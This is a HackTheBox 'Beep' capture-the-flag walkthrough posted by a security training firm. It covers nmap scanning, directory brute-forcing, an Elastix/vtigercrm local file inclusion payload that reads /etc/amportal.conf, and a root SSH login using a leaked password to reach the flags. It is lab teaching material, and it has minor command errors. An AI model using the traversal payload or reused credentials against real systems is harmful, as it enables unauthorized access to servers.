HackTheBox – Walkthrough of BEEP BOX

Beep box has a very large list of running services, which can be challenging to find the correct exploit method. The beep box may be a little difficult for some as there are a number of potential attack vectors.

We will use the following tools to pawn the box on a Kali Linux box

  • NMAP
  • Dirbuster
  • Searchsploit
  • Metasploit

Step 1 – Scanning the network

As an initial step, before the machine is exploited, it needs to be scanned and investigated.

This is important to determine what can be exploited afterwards. It is always better to spend time on this phase to extract maximum informatio.

Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. Raw IP packets are used to determine hosts available on the network, services offered by those hosts, operating systems running, packet filters, firewalls in use, and many other characteristics.

Use the following command to get a basic idea of what we are scanning

nmap -sV -sC -A 10.10.10.7

-sV: Probe open ports to determine service/version info

-sC: Default script sets

-A: Aggressive scan. Enable OS detection, version detection, script scanning, and traceroute

10.10.10.7: IP address of the Beep box

We can see that there are 12 open ports:

Port 22. Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding.

Port 25. Simple Mail Transfer Protocol (SMTP) used for email routing between mail servers.

Port 80. Hypertext Transfer Protocol (HTTP). Here it’s an Apache httpd 2.2.3.

Port 110. Post Office Protocol, version 3 (POP3).

Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC).

Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server.

Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS).

Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS).

Port 995. Post Office Protocol 3 over TLS/SSL (POP3S).

Port 3306. MySQL database system.

Port 4445. I2P HTTP/S proxy.

Port 10000. Webmin, Web-based Unix/Linux system administration tool (default port).

Nmap finds quite a long list of services. The target will be Apache, on port 80.

Step 2 – Enumeration of Directories.

I now use DirBuster. DirBuster is a multi-threaded java application designed to brute force directories and files names on web/application servers.  

You can launch DirBuster by typing this command on the terminal

dirbuster

Specify the target URL as 10.10.10.7:80 in the application

I use the directory-list-2.3-medium.txt for this search.

DirBuster finds a huge list of directories with several content management systems and open source applications. There are several vulnerabilities that can lead to shell amongst the results.

Step 3 – Visiting the URL.

Let’s try port 80 and visit http://10.10.10.7

Adding it to the security exception we can visit the address. Elastix login portal opens. Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialing.

An IP PBX (“Internet Protocol private branch exchange”) is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business.

Searchsploit, command line tool is used to check the vulnerabilities in Elastix.

The following command is used to get the exploit:

cat user/share/exploitdb/exploits/php/webapps/37937.pl

The LFI exploit is as under:

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS).

Step 4 – Trying the Elastix LFI exploit

Let’s navigate to the exploit.

We use the source file to comprehend the contents properly.

Now, we find some usernames and passwords and try to SSH into the network using one of these.

We find that other usernames do not work so we try root to SSH with the following command.

ssh root@10.10.10.7

Try the password jEhdIekWmdjE and Yep! Got an SSH session.

Step 5 – Looking for the root.txt flag

Following command is used to know our location on the machine.

pwd

We are in the root, and by following command

ls

We find the root.txt file.

To read the content of the file the following command is used.

cat root.txt

Step 6 – Looking for the user.txt flag

Now look for flag user.txt

Go to the home directory.

cd home

We found the user.txt file in home>fanis .To read the content of the file following command is used.

type user.txt

Congrats! We found both flags! 😀

Share the Post...
WhatsApp

About Cybervie

Cybervie provides best cyber security training program in hyderabad, India.This cyber security course enables you to detect vulnerablities of a system, wardoff attacks and manage emergency situations. Taking a proactive approach to security that can help organisations to protect their data, Cybervie has designed its training module based on the cyber security industry requirements with three levels of training in both offensive and defensive manner, and use real time scenarios which can help our students to understand the market up-to its standard certification which is an add on advantage for our students to stand out of competition in an cyber security interview.

More Info – Click Here

Recent Posts

Follow Us on Youtube

CSEP : Certified Security Engineer Professional

Certified Security Engineer Professional (CSEP) certification is a comprehensive program designed for individuals aspiring to become cybersecurity engineers. It equips candidates with hands-on knowledge across various in-demand cybersecurity domains, ensuring they are well-prepared for current and future industry needs.

Organizations today seek candidates with a diverse set of skills beyond just one tool or area of expertise. The CSEP certification addresses this need by providing essential hands-on experience, making you proficient in multiple cybersecurity domains.

The program includes live classes featuring practical exercises, followed by a real-time project that offers valuable industrial knowledge.

Domains covered in the CSEP certification:

  • Cybersecurity Essentials
  • Penetration Testing
  • Application Security
  • Security Operations
  • AI in Cybersecurity
  • Multi-Cloud Security
  • Threat Intelligence

 

This certification is ideal for those looking to secure a role as a cybersecurity engineer and want to gain a competitive edge in the cybersecurity field.

For Further kindly feel free to fill out the profile form  for relevant information on our counselor will get in touch with you

Sign up for our Newsletter

Interested in Cyber Security Training Program 2024 – Click Here
Open chat
1
Hello 👋
How can we help you?